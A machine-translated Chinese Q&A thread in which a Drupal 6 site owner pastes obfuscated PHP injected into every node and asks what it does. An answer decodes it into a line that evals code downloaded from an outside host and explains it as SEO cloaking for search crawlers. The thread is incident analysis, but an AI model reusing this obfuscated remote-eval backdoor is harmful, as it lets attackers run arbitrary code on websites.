php - Drupal 6 中的 SQL PHP 注入(inject)攻击

Question

今天，我的 drupal 6 站点中的所有节点都出现了这个添加的 php 脚本

 ?php $node->nid = 849;
     preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');

    if(@$node->body):
    ?php echo @$node->title;?
    ?php echo @$node->body;?
    ?php else:?

    ... here would go the original text of the node

    ?php endif;?

(我删除了一些符号以确保您可以正确阅读 php 代码)

所以，我猜这意味着有人能够更新 drupal 表中的信息并注入(inject)此 php 脚本。

1 - 这段 PHP 代码在做什么(如果有的话)？ (当然除了阻止节点内容的可视化)
2 - 知道他们是如何做到这一点的吗？是 Drupal 安全漏洞吗？一个 Mysql 的？3 - 我想恢复它的唯一方法是完全恢复数据库...

Answer 1

做这个的人，真的试图让代码难以阅读。

我不是 100% 确定这是如何工作的，但顶行的最终结果是这样的:

if(!function_exists('node_update_log'))@eval(@file_get_contents('http://ssedrup.org/at/r_inc.php'));
if(function_exists('node_update_log'))node_update_log($node);

无论是谁因为它是一个 Drupal 站点而将其作为目标站点的，您是否正在运行最新版本？他们可能正在利用 Drupal 中已知的安全漏洞/贡献的 Drupal 模块。您是否在 Drupal 节点中使用 php 过滤器，这可能是访问点。

我查看了链接到的代码，它也变得难以阅读。这是负责更新所有节点的代码。目标似乎是通过查看 IP 地址为搜索引擎爬虫显示特殊内容。这是一种称为时钟的 SEO 策略。

无论如何link to the actual code that is run :

简而言之，这次对您网站的攻击旨在隐藏搜索引擎会对您网站上的某些特殊内容编制索引的事实。这可能是为了提高某些网站的搜索引擎优化。做到这一点的人真的很清楚自己想做什么以及如何去做。